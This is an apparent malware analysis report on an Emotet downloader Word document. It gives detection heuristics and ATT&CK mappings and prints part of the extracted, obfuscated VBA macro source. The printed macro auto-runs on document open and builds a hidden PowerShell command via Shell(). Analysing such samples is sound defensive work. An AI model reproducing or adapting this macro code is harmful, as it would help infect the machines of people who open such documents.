MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function, indicating it's designed to execute external commands. ClamAV detection explicitly identifies it as 'Doc.Downloader.Emotet-6877385-0', strongly suggesting its purpose is to download and execute a secondary payload. The VBA script's obfuscated nature and use of Shell() confirm the malicious intent.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6877385-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6877385-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17073 bytes |
SHA-256: 7144bb067d1fb5b2446e8cffa87b65187569af00dcddc6d0ca82c262b481a98c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "HRaWGVfGBMEn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function tYrLPPm()
On Error Resume Next
Qvptoc = Sqr(91878)
vITWW = 71872 + WacDj + (54275 * CDbl(ftAioY) - UECnO / CSng(62228) - sliwhX / Hex(mvRBc) + 35450 - 44138)
GtwVVj = pajFV
BQwuaE = iIFFi - uFwEtt / 96546 / dMGwon - 223327908 + Hex(wUrXw) * jhlda - Round(65074)
EJfLNI = Sqr(34175)
rYEpwm = 31996 + joNhh + (56252 * CDbl(YNbTL) - AkptD / CSng(95745) - RHfwn / Hex(UIcvin) + 33085 - 41204)
isXNsq = qqpuj
NbYdqo = wvowr - IQtiIF / 91487 / wftwB - 223327908 + Hex(fNrkJz) * RVPVdU - Round(25781)
EzHQZ = Sqr(35538)
vifpI = 68886 + EEpszr + (90811 * CDbl(MfkiSO) - bUijmb / CSng(26746) - FdSAZl / Hex(oMdPiv) + 55279 - 71730)
izSdWv = ldEDWM
tCPCLK = zHqYj - fqVsX / 81897 / EDjlw - 223327908 + Hex(FioTzF) * pYwKii - Round(57569)
wwmWR = Sqr(11285)
qSiDbE = 87497 + osTwZ + (13026 * CDbl(KJtMkY) - vPFMMQ / CSng(23370) - EWtFi / Hex(jfCZuX) + 37079 - 90954)
jHoWtW = OcPtjt
WILuXP = Osdwjo - CTYMii / 82474 / qBcAMI - 223327908 + Hex(ZtuwE) * kuoIR - Round(64339)
tYrLPPm = UBLczC + VBA.Shell(qstLihGVR + Chr(zAsfpw + vbKeyP + cbQDlchnkKi) + "owers" + DjYiKiSOah + hBfOAAdpccw + OKwqi + ibTckNt + jaaNSFSznz + SzbRcnvYkhA, 44598 - 44598)
YwVJdE = Sqr(58923)
SKRWDp = 97770 + jClkw + (33731 * CDbl(jENwD) - ZattF / CSng(27315) - KkHWuR / Hex(kWlOs) + 78001 - 25636)
jRajGG = dOJmbJ
ZfFbs = YdzaLI - uOpfwn / 26096 / zEOtr - 223327908 + Hex(vYwli) * firppa - Round(2134)
bzdPS = Sqr(24303)
ZaqhAi = 57355 + BpdbT + (22955 * CDbl(AqYmQ) - immoI / CSng(44620) - tSGSP / Hex(IRwHZS) + 37871 - 7298)
IQRcFi = jfiiQR
oFdBZr = EtrKSL - iKMYDF / 3722 / wTwHSL - 223327908 + Hex(LtEwOi) * oOURd - Round(88932)
End Function
Private Sub Document_open()
On Error Resume Next
hvbLS = Sqr(35845)
HJESY = 55115 + iwGTw + (9584 * CDbl(VwEmcH) - QLuOl / CSng(35123) - uCpslY / Hex(fJCsAc) + 61215 - 68919)
iIBsj = oQrOGc
ciVkqz = DmKTn - QbKjnq / 78201 / tbfoj - 223327908 + Hex(MSKHf) * PNNQoD - Round(64794)
isqDn = Sqr(37547)
iCpvJn = 93702 + cDoMjD + (26335 * CDbl(rjIoDo) - WwtYGh / CSng(27689) - CziiLa / Hex(tuDNdm) + 38136 - 61036)
wFqIrn = GlvXcd
juQTwQ = qCOTm - BYCTz / 80986 / lpLwC - 223327908 + Hex(mqNrK) * jIwkuH - Round(88758)
tYrLPPm
LviLBV = Sqr(66365)
EDqjRQ = 64094 + YcLDXC + (11660 * CDbl(oHMFM) - YiwfVA / CSng(63740) - WTGwiE / Hex(AcrMw) + 11927 - 68832)
iMLOTh = FJqXE
zkUiL = mvhzsG - zZYBwn / 60391 / sOdof - 223327908 + Hex(kqofLo) * GNJZv - Round(25480)
njhMYX = Sqr(18911)
qHWrp = 62085 + BFsRj + (34003 * CDbl(qLObAa) - ZMNPLY / CSng(43972) - jiail / Hex(zrSkP) + 20609 - 78650)
vfBOdH = VGJEh
iDGOQu = biIfm - NqCjQ / 82469 / wrlPA - 223327908 + Hex(Zdhzzz) * rwXXX - Round(3935)
End Sub
Attribute VB_Name = "iqFHfCU"
Function DjYiKiSOah()
On Error Resume Next
MLTHw = 89216 + jwcHJ + (72606 * CDbl(pwhTYp) - UFrkPo / CSng(25895) - KXpNk / Hex(wikfF) + 69053 - 12203)
sDESrG = XhGANo - SwAOs / 29371 / oSGnZM - 223327908 + Hex(fSzNKV) * lJSfqG - Round(23409)
svEwoA = Sqr(15991)
muVDOi = pGWMbu
jCSlLzu = "HeLL [STrIN" + "g]::JOIn" + "('',([Char[" + "]] (112,2"
lwfSt = 61947 + PGnCSa + (63690 * CDbl(iiBIlr) - WuRYS / CSng(42927) - ZFRia / Hex(KnNwa) + 37519 - 64617)
GkFMSb = AVNWtj - lnzjbv / 40074 / hRJZa - 223327908 + Hex(cKXAI) * zjZOij - Round(4400)
wppNvW = Sqr(25856)
zjsHnc = vZHtr
rQIIvnRh = "1 , 56," + "21 ,38" + " ,23 , 13 ,116" + ", "
WBCnC = 84726 + jYKqW + (70648 * CDbl(iEOkws) - HdUUVN / CSng(22808) - awHFqM / Hex(ilLqhV) + 77770 - 33458)
QCZOXh = hipjw - iQulj / 50977 / YHKXTL - 223327908 + Hex(tSwfAm) * rDRza - Round(92906)
aDOjz = Sqr(76473)
bNzoM = EBOPu
YujJZhcWkd = "105,116 ," + "58" + ",49, " + "35,121,59 , 5" + "4,62 ,49 ,55 ," + " 32 , 116" + ",38,53,58, " + "48 ,59 ,57" + " ,"
KFIrB = 90700 + kZOjJ + (63007 * CDbl(wrNco) - iKuwS / CSng(66763) - IJjJVj / Hex(bMiLPC) + 28455 - 23415)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.